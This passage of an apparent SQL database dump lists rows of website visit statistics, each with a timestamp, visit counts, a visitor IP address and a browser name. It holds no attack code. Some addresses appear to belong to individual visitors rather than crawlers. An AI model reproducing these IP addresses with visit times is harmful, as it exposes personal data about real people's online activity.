,0,'91.196.178.101','chrome'),(77170,1480687269,1,1,0,0,'46.211.7.48','chrome'),(77171,1480688182,2,2,0,0,'91.124.45.76','chrome'),(77172,1480688898,1,1,0,0,'91.196.178.132','chrome'),(77173,1480688932,1,1,0,0,'163.172.64.185','other'),(77174,1480690203,1,0,1,0,'66.249.64.61',''),(77175,1480691340,1,0,1,0,'66.249.64.187',''),(77176,1480691342,1,1,0,0,'91.124.238.95','firefox'),(77177,1480692696,1,1,0,0,'66.102.9.25','other'),(77178,1480694575,1,1,0,0,'163.172.64.244','other'),(77179,1480695249,1,1,0,0,'40.77.167.61','other'),(77180,1480697585,1,1,0,0,'91.124.238.95','firefox'),(77181,1480698483,1,1,0,0,'141.0.13.170','other'),(77182,1480698767,1,1,0,0,'66.102.9.29','other'),(77183,1480698932,1,1,0,0,'66.249.64.57','chrome'),(77184,1480700652,1,1,0,0,'163.172.64.185','other'),(77185,1480700804,1,1,0,0,'163.172.64.248','other'),(77186,1480703016,1,1,0,0,'163.172.64.180','other'),(77187,1480704136,1,1,0,0,'91.196.178.34','chrome'),(77188,1480704953,1,1,0,0,'180.76.15.27','other'),(77189,1480705059,1,1,0,0,'82.145.221.37','other'),(77190,1480705733,1,0,1,0,'66.249.75.187',''),(77191,1480706410,1,0,1,0,'66.249.69.155',''),(77192,1480707920,1,1,0,0,'66.249.75.179','chrome'),(77193,1480707945,1,1,0,0,'66.249.69.155','chrome'),(77194,1480708972,1,1,0,0,'180.76.15.33','other'),(77195,1480709274,1,1,0,0,'91.124.238.95','firefox'),(77196,1480710991,2,1,1,0,'62.210.83.88',''),(77197,1480713575,1,1,0,0,'163.172.64.192','other'),(77198,1480713691,1,1,0,0,'66.102.9.27','other'),(77199,1480715660,1,0,1,0,'68.180.229.190',''),(77200,1480716199,1,1,0,0,'163.172.64.232','other'),(77201,1480717249,1,1,0,0,'40.77.167.61','other'),(77202,1480717386,1,1,0,0,'94.180.143.106','chrome'),(77203,1480717636,1,1,0,0,'163.172.64.177','other'),(77204,1480718936,1,1,0,0,'163.172.64.227','other'),(77205,1480722430,1,1,0,0,'46.73.165.32','opera'),(77206,1480722544,1,1,0,0,'163.172.64.252','other'),(77207,1480725185,1,1,0,0,'163.172.64.217','other'),(77208,1480726130,1,1,0,0,'163.172.64.189','other'),(77209,1480726534,1,1,0,0,'163.172.64.186','other'),(77210,1480726621,1,1,0,0,'91.121.181.101','other'),(77211,1480727649,69,69,0,0,'94.199.151.22','other'),(77212,1480727736,1,1,0,0,'163.172.64.240','other'),(77213,1480728150,1,1,0,0,'163.172.64.220','other'),(77214,1480728161,1,1,0,0,'66.102.9.25','other'),(77215,1480728355,1,1,0,0,'163.172.64.192','other'),(77216,1480733337,1,0,1,0,'66.249.75.179',''),(77217,1480734731,1,1,0,0,'163.172.64.250','other'),(77218,1480735016,1,0,1,0,'66.249.75.179',''),(77219,1480735163,1,1,0,0,'141.8.142.61','other'),(77220,1480736126,1,0,1,0,'66.249.75.183',''),(77221,1480736773,1,0,1,0,'66.249.69.242',''),(77222,1480739167,1,1,0,0,'163.172.64.236','other'),(77223,1480740873,1,0,1,0,'68.180.228.223',''),(77224,1480742206,1,0,1,0,'66.249.75.187',''),(77225,1480742511,1,1,0,0,'66.102.9.25','other'),(77226,1480742758,1,1,0,0,'163.172.64.248','other'),(77227,1480742841,1,0,1,0,'66.249.75.179',''),(77228,1480743443,1,0,1,0,'66.249.75.183',''),(77229,1480744065,1,0,1,0,'66.249.75.187',''),(77230,1480747012,2,2,0,0,'95.213.141.126','opera'),(77231,1480750648,1,0,1,0,'66.249.75.187',''),(77232,1480751201,1,1,0,0,'180.76.15.149','other'),(77233,1480751594,1,1,0,0,'66.249.93.157','chrome'),(77234,1480751862,1,0,1,0,'66.249.75.187',''),(77235,1480751935,1,1,0,0,'163.172.64.251','other'),(77236,1480753127,1,1,0,0,'193.110.17.58','chrome'),(77237,1480753156,1,1,0,0,'141.8.184.22','other'),(77238,1480755016,1,1,0,0,'40.77.167.63','other'),(77239,1480755759,1,1,0,0,'180.76.15.161','other'),(77240,1480756407,1,1,0,0,'66.102.9.29','other'),(77241,1480756892,1,0,1,0,'66.249.75.179',''),(77242,1480757227,2,2,0,0,'66.249.93.156','chrome'),(77243,1480761394,1,1,0,0,'217.69.133.4','other'),(77244,1480764778,1,1,0,0,'130.193.51.19','other'),(77245,1480767696,1,1,0,0,'163.172.64.199','other'),(77246,1480768710,1,1,0,0,'91.124.238.95','firefox'),(77247,1480770737,1,0,1,0,'66.249.75.179',''),(77248,1480772873,1,1,0,0,'163.172.64.180','other'),(77249,1480773047,1,0,1,0,'66.249.75.183',''),(77250,1480775250,1,1,0,0,'207.46.13.91','other'),(77251,1480775365,1,1,0,0,'178.93.134.61','chrome'),(77252,1480775700,1,1,0,0,'163.172.64.252','other'),(77253,1480780714,1,1,0,0,'66.102.9.27','chrome'),(77254,1480784088,1,1,0,0,'5.45.192.67','chrome'),(77255,1480785424,1,1,0,0,'180.76.15.145','other'),(77256,1480785804,1,1,0,0,'66.102.9.25','other'),(77257,1480786373,1,1,0,0,'92.101.219.178','other'),(77258,1480787513,1,1,0,0,'66.249.75.187','chrome'),(77259,1480788205,1,1,0,0,'66.249.75.179','chrome'),(77260,1480789539,1,1,0,0,'92.101.219.178','other'),(77261,1480791374,1,1,0,0,'130.193.50.34','other'),(77262,1480791388,1,1,0,0,'130.193.51.19','other'),(77263,1480792341,1,1,0,0,'92.113.191.182','chrome'),(77264,1480794576,1,1,0,0,'91.196.178.67','firefox'),(77265,1480794595,1,1,0,0,'141.8.183.25','other'),(77266,1480795312,1,1,0,0,'66.249.76.108','chrome'),(77267,1480800117,1,1,0,0,'40.77.167.63','other'),(77268,1480800420,1,1,0,0,'66.102.9.29','other'),(77269,1480800794,1,0,1,0,'68.180.229.190',''),(77270,1480804186,1,0,1,0,'66.249.66.84',''),(77271,1480805689,1,0,1,0,'66.249.66.81',''),(77272,1480807338,1,1,0,0,'141.8.183.19','other'),(77273,1480809119,1,1,0,0,'163.172.64.222','other'),(77274,1480810357,1,0,1,0,'66.249.66.81',''),(77275,1480812261,1,1,0,0,'66.249.76.30','chrome'),(77276,1480813235,1,1,0,0,'217.69.133.203','other'),(77277,1480814242,1,0,1,0,'66.249.76.29',''),(77278,1480814578,1,1,0,0,'66.102.9.27','other'),(77279,1480816524,1,1,0,0,'163.172.64.226','other'),(77280,1480818277,1,1,0,0,'66.249.76.28','chrome'),(77281,1480818796,2,2,0,0,'141.8.183.25','other'),(77282,1480819343,1,1,0,0,'130.193.51.19','other'),(77283,1480819718,1,1,0,0,'163.172.64.223','other'),(77284,1480820299,1,1,0,0,'163.172.64.193','other'),(77285,1480825630,1,0,1,0,'68.180.228.223',''),(77286,1480826447,1,0,1,0,'66.249.76.28',''),(77287,1480828185,1,1,0,0,'141.8.142.153','other'),(77288,1480829372,2,1,1,0,'62.210.83.88',''),(77289,1480829399,1,1,0,0,'66.102.9.29','other'),(77290,1480829956,1,1,0,0,'157.55.39.7','other'),(77291,1480830653,1,1,0,0,'66.249.76.109','chrome'),(77292,1480831372,1,0,1,0,'66.249.76.30',''),(77293,1480831373,1,1,0,0,'130.193.51.19','other'),(77294,1480831384,1,1,0,0,'5.255.253.53','other'),(77295,1480833175,1,1,0,0,'204.79.180.252','msie'),(77296,1480833677,1,0,1,0,'66.249.76.28',''),(77297,1480838169,1,1,0,0,'66.249.93.157','chrome'),(77298,1480838789,1,0,1,0,'66.249.66.84',''),(77299,1480838821,1,0,1,0,'66.249.66.87',''),(77300,1480841609,1,1,0,0,'188.32.97.55','msie'),(77301,1480843121,1,1,0,0,'130.193.50.34','other'),(77302,1480843719,1,1,0,0,'66.102.9.27','other'),(77303,1480845031,1,1,0,0,'95.24.237.247','msie'),(77304,1480845910,1,1,0,0,'128.68.34.0','msie'),(77305,1480846168,1,1,0,0,'5.255.253.10','other'),(77306,1480846502,1,0,1,0,'68.180.228.223',''),(77307,1480849865,2,2,0,0,'130.193.51.19','other'),(77308,1480849935,1,1,0,0,'141.8.142.58','other'),(77309,1480850466,1,1,0,0,'66.249.76.109','chrome'),(77310,1480850524,6,6,0,0,'213.239.205.207','other'),(77311,1480851911,1,1,0,0,'91.124.238.95','firefox'),(77312,1480852136,1,1,0,0,'66.249.76.46','chrome'),(77313,1480853649,1,1,0,0,'130.193.51.19','other'),(77314,1480853835,6,0,6,0,'68.180.228.223',''),(77315,1480854676,1,1,0,0,'130.193.50.34','other'),(77316,1480854700,1,1,0,0,'130.193.51.19','other'),(77317,1480854864,1,1,0,0,'109.63.187.12','chrome'),(77318,1480856155,1,0,1,0,'66.249.76.45',''),(77319,1480858207,1,1,0,0,'66.102.9.29','other'),(77320,1480858565,1,1,0,0,'163.172.64.242','other'),(77321,1480858641,1,1,0,0,'141.8.142.58','other'),(77322,1480859679,1,1,0,0,'163.172.64.183','other'),(77323,1480860168,1,0,1,0,'66.249.76.109',''),(77324,1480861499,1,1,0,0,'180.76.15.139','other'),(77325,1480861633,1,1,0,0,'141.8.183.25','other'),(77326,1480862354,1,1,0,0,'66.249.76.47','chrome'),(77327,1480862402,1,1,0,0,'66.249.76.109','chrome'),(77328,1480866608,1,0,1,0,'68.180.228.223',''),(77329,1480867371,1,1,0,0,'94.179.11.35','firefox'),(77330,1480868800,1,1,0,0,'157.55.39.7','other'),(77331,1480869145,1,1,0,0,'94.178.7.116','chrome'),(77332,1480871060,1,1,0,0,'91.196.178.168','firefox'),(77333,1480871228,1,1,0,0,'92.101.193.218','other'),(77334,1480872719,1,1,0,0,'66.102.9.29','other'),(77335,1480874075,1,1,0,0,'46.219.250.66','chrome'),(77336,1480874630,1,1,0,0,'141.8.183.25','other'),(77337,1480875881,1,1,0,0,'46.211.252.8','chrome'),(77338,1480876603,1,1,0,0,'157.55.39.7','other'),(77339,1480876790,1,0,1,0,'66.249.76.45',''),(77340,1480876800,1,1,0,0,'91.124.238.95','firefox'),(77341,1480880030,14,14,0,0,'195.154.133.25','other'),(77342,1480885638,1,1,0,0,'207.46.13.91','other'),(77343,1480886371,1,0,1,0,'66.249.65.60',''),(77344,1480887001,1,1,0,0,'66.102.9.27','other'),(77345,1480887729,2,1,1,0,'66.249.76.47',''),(77346,1480888028,1,1,0,0,'92.112.150.95','chrome'),(77347,1480889133,1,0,1,0,'66.249.76.46',''),(77348,1480889256,1,1,0,0,'163.172.64.181','other'),(77349,1480889358,1,0,1,0,'66.249.76.47',''),(77350,1480889362,1,0,1,0,'66.249.76.45',''),(77351,1480890470,1,1,0,0,'66.249.76.47','chrome'),(77352,1480891680,1,1,0,0,'66.249.76.46','chrome'),(77353,1480892502,1,1,0,0,'66.249.66.84','chrome'),(77354,1480895982,1,1,0,0,'163.172.64.242','other'),(77355,1480897243,1,1,0,0,'163.172.64.220','other'),(77356,1480897628,1,0,1,0,'66.249.66.87',''),(77357,1480898271,1,0,1,0,'66.249.76.47',''),(77358,1480900514,1,1,0,0,'163.172.64.235','other'),(77359,1480901149,1,0,1,0,'66.249.76.46',''),(77360,1480901495,1,1,0,0,'66.102.9.25','other'),(77361,1480903543,1,1,0,0,'163.172.64.186','other'),(77362,1480905710,1,1,0,0,'163.172.64.224','other'),(77363,1480906144,1,1,0,0,'163.172.64.250','other'),(77364,1480907720,1,1,0,0,'163.172.64.216','other'),(77365,1480909776,1,1,0,0,'66.102.9.27','other'),(77366,1480909909,1,1,0,0,'66.102.9.27','chrome'),(77367,1480910005,1,1,0,0,'66.102.9.25','chrome'),(77368,1480911953,1,1,0,0,'163.172.64.251','other'),(77369,1480913808,1,1,0,0,'217.69.133.225','other'),(77370,1480916711,1,1,0,0,'207.46.13.91','other'),(77371,1480916778,1,0,1,0,'66.249.76.46',''),(77372,1480918200,1,1,0,0,'178.92.85.82','chrome'),(77373,1480919355,1,1,0,0,'91.196.178.67','chrome'),(77374,1480919944,1,1,0,0,'163.172.64.230','other'),(77375,1480920202,1,1,0,0,'130.193.51.19','other'),(77376,1480921802,9,9,0,0,'163.172.68.133','other'),(77377,1480922350,1,0,1,0,'66.249.66.81',''),(77378,1480922584,1,1,0,0,'91.196.178.70','firefox'),(77379,1480922664,1,1,0,0,'66.249.76.47','chrome'),(77380,1480924211,1,1,0,0,'66.102.9.25','other'),(77381,1480924693,1,0,1,0,'66.249.76.108',''),(77382,1480924896,1,1,0,0,'91.196.178.166','chrome'),(77383,1480925689,1,1,0,0,'91.196.178.69','chrome'),(77384,1480925723,1,1,0,0,'91.196.178.65','firefox'),(77385,1480925896,1,0,1,0,'66.249.76.107',''),(77386,1480926146,1,0,1,0,'66.249.76.46',''),(77387,1480926268,12,12,0,0,'46.4.32.75','other'),(77388,1480926447,1,1,0,0,'91.196.178.70','firefox'),(77389,1480926653,1,0,1,0,'66.249.76.47',''),(77390,1480926804,1,0,1,0,'66.249.76.109',''),(77391,1480926874,1,1,0,0,'91.196.178.65','chrome'),(77392,1480927002,1,0,1,0,'66.249.66.84',''),(77393,1480927636,1,1,0,0,'82.207.91.234','firefox'),(77394,1480928348,1,1,0,0,'91.196.177.110','chrome'),(77395,1480928407,1,1,0,0,'207.46.13.91','other'),(77396,1480928991,1,1,0,0,'94.178.218.218','chrome'),(77397,1480929528,1,0,1,0,'66.249.76.46',''),(77398,1480929843,1,0,1,0,'66.249.76.107',''),(77399,1480929866,1,0,1,0,'66.249.76.47',''),(77400,1480930159,1,1,0,0,'87.76.241.189','opera'),(77401,1480930468,1,1,0,0,'66.249.93.15','chrome'),(77402,1480930994,1,0,1,0,'66.249.76.107',''),(77403,1480931068,1,1,0,0,'91.196.178.67','firefox'),(77404,1480932373,1,1,0,0,'180.76.15.13','other'),(77405,1480932784,1,1,0,0,'130.180.219.230','chrome'),(77406,1480932879,1,1,0,0,'195.191.104.247','firefox'),(77407,1480932898,1,1,0,0,'130.193.50.34','other'),(77408,1480932953,1,1,0,0,'163.172.64.229','other'),(77409,1480933246,1,1,0,0,'163.172.64.188','other'),(77410,1480933257,1,1,0,0,'37.53.92.246','chrome'),(77411,1480933416,2,2,0,0,'141.8.183.25','other'),(77412,1480933614,1,1,0,0,'163.172.64.225','other'),(77413,1480933841,1,1,0,0,'91.196.178.166','chrome'),(77414,1480933882,1,1,0,0,'91.196.178.67','firefox'),(77415,1480934310,1,0,1,0,'66.249.66.87',''),(77416,1480934859,1,1,0,0,'91.196.178.69','chrome'),(77417,1480934867,1,1,0,0,'93.158.152.84','other'),(77418,1480934974,1,1,0,0,'91.196.178.67','firefox'),(77419,1480936580,1,1,0,0,'91.196.177.26','chrome'),(77420,1480936612,1,1,0,0,'188.231.193.207','chrome'),(77421,1480936823,1,1,0,0,'104.45.18.178','other'),(77423,1480936836,1,1,0,0,'195.78.112.11','chrome'),(77424,1480936862,1,0,1,0,'66.249.66.183',''),(77425,1480936976,1,0,1,0,'66.249.76.45',''),(77426,1480937050,1,0,1,0,'66.249.66.177',''),(77427,1480937702,1,0,1,0,'66.249.76.47',''),(77428,1480937897,2,0,2,0,'66.249.66.183',''),(77429,1480938002,1,1,0,0,'91.196.178.66','chrome'),(77430,1480938134,1,1,0,0,'157.55.39.7','other'),(77431,1480938725,1,1,0,0,'66.102.9.29','other'),(77432,1480938754,1,1,0,0,'85.115.62.180','other'),(77433,1480938885,1,1,0,0,'91.196.178.68','other'),(77434,1480938948,1,1,0,0,'195.78.112.11','chrome'),(77435,1480939385,2,2,0,0,'91.196.179.134','chrome'),(77436,1480940069,1,1,0,0,'91.196.178.67','firefox'),(77437,1480940574,1,1,0,0,'91.196.178.162','chrome'),(77438,1480940594,1,0,1,0,'66.249.66.87',''),(77439,1480940695,2,0,2,0,'66.249.76.109',''),(77440,1480940771,1,0,1,0,'66.249.76.46',''),(77441,1480940985,1,1,0,0,'91.196.178.165','chrome'),(77442,1480941128,1,1,0,0,'180.76.15.30','other'),(77443,1480941271,1,0,1,0,'66.249.76.47',''),(77444,1480941346,1,1,0,0,'91.196.177.46','chrome'),(77445,1480941536,1,0,1,0,'66.249.76.107',''),(77446,1480941664,2,2,0,0,'94.178.133.12','firefox'),(77447,1480941726,1,1,0,0,'37.54.18.224','chrome'),(77448,1480941809,1,1,0,0,'94.179.208.144','chrome'),(77449,1480942224,1,1,0,0,'31.43.3.160','chrome'),(77450,1480942441,1,0,1,0,'66.249.76.107',''),(77451,1480942894,1,1,0,0,'91.220.230.153','chrome'),(77452,1480942900,1,1,0,0,'141.8.183.25','other'),(77453,1480943337,1,0,1,0,'66.249.76.47',''),(77454,1480943416,1,1,0,0,'37.55.151.192','firefox'),(77455,1480943983,1,1,0,0,'163.172.64.178','other'),(77456,1480944158,1,1,0,0,'91.196.178.67','firefox'),(77457,1480945025,1,1,0,0,'91.196.177.46','firefox'),(77458,1480945044,1,1,0,0,'141.8.183.25','other'),(77459,1480945381,1,1,0,0,'91.196.178.37','chrome'),(77460,1480946020,1,0,1,0,'66.249.76.45',''),(77461,1480946065,1,1,0,0,'178.95.234.58','chrome'),(77462,1480946569,1,1,0,0,'163.172.64.253','other'),(77463,1480946587,1,1,0,0,'94.179.104.204','firefox'),(77464,1480946966,1,1,0,0,'94.179.78.120','firefox'),(77465,1480947104,1,1,0,0,'207.46.13.125','other'),(77466,1480947199,1,1,0,0,'91.196.179.134','chrome'),(77467,1480947756,1,1,0,0,'37.52.148.143','chrome'),(77468,1480947903,1,1,0,0,'163.172.64.185','other'),(77469,1480948362,1,1,0,0,'94.179.98.217','chrome'),(77470,1480948394,1,1,0,0,'91.196.177.46','chrome'),(77471,1480948877,1,0,1,0,'66.249.76.107',''),(77472,1480949110,1,0,1,0,'66.249.76.109',''),(77473,1480949287,1,0,1,0,'66.249.76.108',''),(77474,1480949452,1,1,0,0,'91.196.178.68','firefox'),(77475,1480949712,1,0,1,0,'68.180.229.190',''),(77476,1480949958,1,1,0,0,'37.53.239.221','firefox'),(77477,1480949987,1,1,0,0,'94.179.6.83','chrome'),(77478,1480950214,1,1,0,0,'141.8.142.61','other'),(77479,1480950608,1,1,0,0,'141.8.183.25','other'),(77480,1480952433,1,1,0,0,'91.196.177.15','chrome'),(77481,1480953054,1,1,0,0,'82.207.91.234','firefox'),(77482,1480953127,1,1,0,0,'66.102.9.25','other'),(77483,1480953316,1,1,0,0,'91.196.178.68','firefox'),(77484,1480953838,2,0,2,0,'66.249.76.46',''),(77485,1480954445,1,1,0,0,'66.102.9.29','chrome'),(77486,1480955748,1,1,0,0,'94.179.36.134','firefox'),(77487,1480957426,1,1,0,0,'195.154.181.162','chrome'),(77488,1480958810,1,1,0,0,'130.193.50.34','other'),(77489,1480960249,1,0,1,0,'66.249.76.30',''),(77490,1480961185,1,1,0,0,'180.76.15.5','other'),(77491,1480961483,2,0,2,0,'66.249.76.109',''),(77492,1480961735,1,1,0,0,'91.196.178.161','other'),(77493,1480963576,4,4,0,0,'87.98.217.57','other'),(77494,1480963837,1,0,1,0,'66.249.76.109',''),(77495,1480964017,1,1,0,0,'163.172.64.178','other'),(77496,1480964291,1,1,0,0,'141.8.183.25','other'),(77497,1480964382,1,1,0,0,'163.172.64.245','other'),(77498,1480965132,1,0,1,0,'66.249.76.30',''),(77499,1480965197,2,0,2,0,'66.249.66.81',''),(77500,1480965605,1,1,0,0,'91.124.119.90','firefox'),(77501,1480965647,1,1,0,0,'5.45.192.65','chrome'),(77502,1480966753,1,1,0,0,'66.249.76.109','chrome'),(77503,1480967042,1,0,1,0,'66.249.76.28',''),(77504,1480967298,1,1,0,0,'130.193.50.34','other'),(77505,1480967532,1,1,0,0,'66.102.9.29','other'),(77506,1480968124,1,1,0,0,'180.76.15.144','other'),(77507,1480969771,1,1,0,0,'66.249.76.30','chrome'),(77508,1480969790,1,1,0,0,'66.249.76.107','chrome'),(77509,1480969851,1,1,0,0,'163.172.64.216','other'),(77510,1480969949,1,0,1,0,'66.249.76.28',''),(77511,1480970041,1,1,0,0,'163.172.64.233','other'),(77512,1480970875,1,1,0,0,'163.172.64.230','other'),(77513,1480971932,1,0,1,0,'66.249.76.30',''),(77514,1480972640,1,1,0,0,'163.172.64.180','other'),(77515,1480973153,1,1,0,0,'180.76.15.138','other'),(77516,1480973387,1,1,0,0,'130.193.50.34','other'),(77517,1480973755,1,1,0,0,'163.172.64.252','other'),(77518,1480974047,1,0,1,0,'68.180.228.223',''),(77519,1480974144,1,1,0,0,'66.249.76.30','chrome'),(77520,1480975022,1,1,0,0,'66.249.76.108','chrome'),(77521,1480975521,1,1,0,0,'46.211.155.231','chrome'),(77522,1480975678,1,1,0,0,'163.172.64.248','other'),(77523,1480977159,1,0,1,0,'66.249.76.29',''),(77524,1480977180,1,0,1,0,'66.249.76.28',''),(77525,1480979185,1,1,0,0,'163.172.64.220','other'),(77526,1480979816,1,1,0,0,'157.55.39.7','other'),(77527,1480979877,1,0,1,0,'66.249.66.87',''),(77528,1480980465,1,0,1,0,'66.249.76.28',''),(77529,1480982061,1,0,1,0,'66.249.76.29',''),(77530,1480982077,1,1,0,0,'188.244.45.43','other'),(77531,1480982583,1,1,0,0,'66.102.9.25','other'),(77532,1480986255,1,1,0,0,'163.172.64.249','other'),(77533,1480988764,1,1,0,0,'66.249.76.28','chrome'),(77534,1480990394,1,1,0,0,'157.55.39.7','other'),(77535,1480994105,1,1,0,0,'163.172.64.183','other'),(77536,1480994620,1,1,0,0,'163.172.64.199','other'),(77537,1480994959,1,1,0,0,'66.249.66.87','chrome'),(77538,1480995122,1,0,1,0,'66.249.76.28',''),(77539,1480995776,1,1,0,0,'66.102.9.29','other'),(77540,1480996481,1,1,0,0,'163.172.64.188','other'),(77541,1480996518,1,0,1,0,'66.249.76.29',''),(77542,1480997068,1,1,0,0,'207.241.226.218','other'),(77543,1480997070,1,1,0,0,'212.90.60.83','firefox'),(77544,1480998699,1,1,0,0,'66.249.76.108','chrome'),(77545,1480998704,1,1,0,0,'163.172.64.231','other'),(77546,1480998860,1,1,0,0,'163.172.64.184','other'),(77547,1480998864,1,1,0,0,'207.46.13.91','other'),(77548,1481000860,1,1,0,0,'157.55.39.7','other'),(77549,1481001039,1,1,0,0,'163.172.64.246','other'),(77550,1481001562,1,0,1,0,'66.249.76.28',''),(77551,1481002267,1,1,0,0,'46.242.121.116','msie'),(77552,1481002642,1,1,0,0,'66.249.76.109','chrome'),(77553,1481004357,1,1,0,0,'91.196.178.66','firefox'),(77554,1481004637,1,0,1,0,'66.249.66.180',''),(77555,1481004777,1,0,1,0,'66.249.76.108',''),(77556,1481005023,7,7,0,0,'5.9.142.226','other'),(77557,1481006094,1,1,0,0,'91.196.178.67','firefox'),(77558,1481007002,1,1,0,0,'91.196.178.68','chrome'),(77559,1481007142,1,1,0,0,'91.196.178.68','firefox'),(77560,1481007165,1,1,0,0,'130.193.50.34','other'),(77561,1481007761,1,1,0,0,'91.196.178.166','chrome'),(77562,1481008012,1,1,0,0,'163.172.64.254','other'),(77563,1481008417,1,1,0,0,'91.196.178.65','firefox'),(77564,1481008491,1,1,0,0,'163.172.64.216','other'),(77565,1481008851,1,1,0,0,'94.179.126.214','firefox'),(77566,1481010358,1,1,0,0,'66.102.9.29','chrome'),(77567,1481010599,1,1,0,0,'180.76.15.7','other'),(77568,1481010665,1,1,0,0,'91.196.178.68','chrome'),(77569,1481011009,1,1,0,0,'130.180.218.22','firefox'),(77570,1481011265,1,1,0,0,'178.94.50.70','chrome'),(77571,1481011387,1,1,0,0,'66.102.9.27','other'),(77572,1481011930,2,2,0,0,'141.8.142.58','other'),(77573,1481012009,2,2,0,0,'91.196.178.135','chrome'),(77574,1481012168,1,1,0,0,'91.196.178.68','chrome'),(77575,1481012367,1,1,0,0,'93.74.212.147','firefox'),(77576,1481012485,1,1,0,0,'91.196.178.68','firefox'),(77577,1481012959,1,1,0,0,'157.55.39.102','other'),(77578,1481013200,1,1,0,0,'37.53.230.232','firefox'),(77579,1481013218,1,0,1,0,'66.249.76.28',''),(77580,1481013736,1,1,0,0,'91.196.177.26','chrome'),(77581,1481014260,1,1,0,0,'37.52.117.97','opera'),(77582,1481014843,1,1,0,0,'163.172.64.224','other'),(77583,1481016442,1,1,0,0,'66.249.76.30','chrome'),(77584,1481016584,1,1,0,0,'91.196.178.37','chrome'),(77585,1481018458,1,1,0,0,'91.196.178.68','other'),(77586,1481019811,1,1,0,0,'91.196.178.69','chrome'),(77587,1481020306,1,1,0,0,'91.196.178.165','chrome'),(77588,1481021205,1,1,0,0,'194.44.71.116','chrome'),(77589,1481021565,1,1,0,0,'163.172.64.180','other'),(77590,1481021905,1,0,1,0,'66.249.76.28',''),(77591,1481021949,2,2,0,0,'40.77.167.82','other'),(77592,1481022719,1,1,0,0,'91.196.178.68','firefox'),(77593,1481023723,1,1,0,0,'163.172.64.252','other'),(77594,1481024055,1,1,0,0,'91.196.178.66','firefox'),(77595,1481024757,1,1,0,0,'195.49.151.99','chrome'),(77596,1481025085,1,1,0,0,'91.196.178.165','chrome'),(77597,1481025218,1,0,1,0,'66.249.76.28',''),(77598,1481025941,1,1,0,0,'66.102.9.27','other'),(77599,1481027444,1,1,0,0,'91.196.178.37','chrome'),(77600,1481027607,1,1,0,0,'91.196.178.66','firefox'),(77601,1481028465,4,4,0,0,'46.201.54.12','firefox'),(77602,1481029108,1,1,0,0,'66.249.76.28','chrome'),(77603,1481029544,1,1,0,0,'66.249.76.29','chrome'),(77604,1481029969,1,0,1,0,'66.249.76.30',''),(77605,1481030395,1,1,0,0,'91.196.178.65','chrome'),(77606,1481030954,1,1,0,0,'130.193.51.19','other'),(77607,1481030990,1,1,0,0,'91.196.178.67','firefox'),(77608,1481032725,1,1,0,0,'94.178.7.230','chrome'),(77609,1481032826,1,1,0,0,'66.249.76.30','chrome'),(77610,1481034704,1,1,0,0,'93.78.205.38','chrome'),(77611,1481034737,1,1,0,0,'91.196.178.67','chrome'),(77612,1481035029,1,1,0,0,'91.196.178.68','firefox'),(77613,1481035421,1,1,0,0,'130.193.51.19','other'),(77614,1481035475,1,1,0,0,'91.196.178.70','firefox'),(77615,1481035788,1,1,0,0,'91.196.178.66','firefox'),(77616,1481036166,1,1,0,0,'91.196.178.68','firefox'),(77617,1481036542,1,1,0,0,'91.220.230.153','chrome'),(77618,1481036631,1,1,0,0,'163.172.64.242','other'),(77619,1481038284,1,1,0,0,'130.193.50.4','other'),(77620,1481039013,1,1,0,0,'82.207.49.94','chrome'),(77621,1481040198,1,0,1,0,'66.249.76.28',''),(77622,1481040489,1,1,0,0,'66.102.9.57','other'),(77623,1481041747,1,1,0,0,'66.249.76.28','chrome'),(77624,1481041915,1,1,0,0,'91.124.180.117','firefox'),(77625,1481042127,1,1,0,0,'91.220.230.153','chrome'),(77626,1481042533,1,1,0,0,'157.55.39.102','other'),(77627,1481042786,1,1,0,0,'130.193.51.19','other'),(77628,1481043389,1,1,0,0,'163.172.64.237','other'),(77629,1481043708,1,0,1,0,'66.249.75.179',''),(77630,1481043721,1,1,0,0,'141.8.183.25','other'),(77631,1481046928,1,1,0,0,'130.180.216.89','chrome'),(77632,1481047684,1,1,0,0,'94.179.208.16','chrome'),(77633,1481048735,1,1,0,0,'141.0.13.40','other'),(77634,1481048761,2,0,2,0,'66.249.75.183',''),(77635,1481049386,6,6,0,0,'5.9.88.103','other'),(77636,1481049706,1,0,1,0,'66.249.75.179',''),(77637,1481050126,1,0,1,0,'66.249.75.183',''),(77638,1481050504,1,1,0,0,'91.196.178.37','chrome'),(77639,1481051762,1,1,0,0,'130.193.50.34','other'),(77640,1481052001,1,0,1,0,'66.249.69.152',''),(77641,1481052360,1,0,1,0,'66.249.75.179',''),(77642,1481052743,1,1,0,0,'66.102.9.61','other'),(77643,1481052908,1,1,0,0,'46.211.154.83','other'),(77644,1481053122,1,1,0,0,'163.172.64.180','other'),(77645,1481053900,1,1,0,0,'91.196.178.136','chrome'),(77646,1481054189,1,1,0,0,'157.55.39.124','other'),(77647,1481055835,1,1,0,0,'163.172.64.252','other'),(77648,1481056279,1,1,0,0,'130.193.50.34','other'),(77649,1481056769,2,0,2,0,'66.249.75.187',''),(77650,1481056996,1,1,0,0,'46.250.124.29','chrome'),(77651,1481057372,1,0,1,0,'68.180.228.223',''),(77652,1481057729,1,0,1,0,'66.249.75.187',''),(77653,1481058442,1,1,0,0,'163.172.64.250','other'),(77654,1481058843,1,1,0,0,'66.102.9.59','other'),(77655,1481058979,2,0,2,0,'66.249.75.187',''),(77656,1481058983,1,0,1,0,'66.249.69.152',''),(77657,1481059623,1,1,0,0,'157.55.39.102','other'),(77658,1481060777,1,1,0,0,'157.55.39.124','other'),(77659,1481060918,1,1,0,0,'163.172.64.254','other'),(77660,1481062322,1,0,1,0,'66.249.75.183',''),(77661,1481062629,1,1,0,0,'207.46.13.121','other'),(77662,1481063135,2,0,2,0,'66.249.75.187',''),(77663,1481063173,2,2,0,0,'64.62.210.39','chrome'),(77664,1481063837,1,1,0,0,'163.172.64.226','other'),(77665,1481065504,1,1,0,0,'141.8.183.25','other'),(77666,1481066274,1,0,1,0,'66.249.69.152',''),(77667,1481066532,1,1,0,0,'40.77.167.82','other'),(77668,1481066654,1,1,0,0,'163.172.64.193','other'),(77669,1481066780,1,1,0,0,'85.114.213.59','chrome'),(77670,1481067719,1,1,0,0,'188.134.68.55','firefox'),(77671,1481068127,2,0,2,0,'66.249.75.187',''),(77672,1481069534,1,1,0,0,'163.172.64.253','other'),(77673,1481069556,1,1,0,0,'163.172.64.235','other'),(77674,1481069567,1,1,0,0,'207.241.226.230','other'),(77675,1481071697,1,0,1,0,'66.249.75.187',''),(77676,1481072060,1,1,0,0,'46.119.108.36','chrome'),(77677,1481074008,1,1,0,0,'66.102.9.59','other'),(77678,1481074045,1,0,1,0,'66.249.75.179',''),(77679,1481074266,1,0,1,0,'66.249.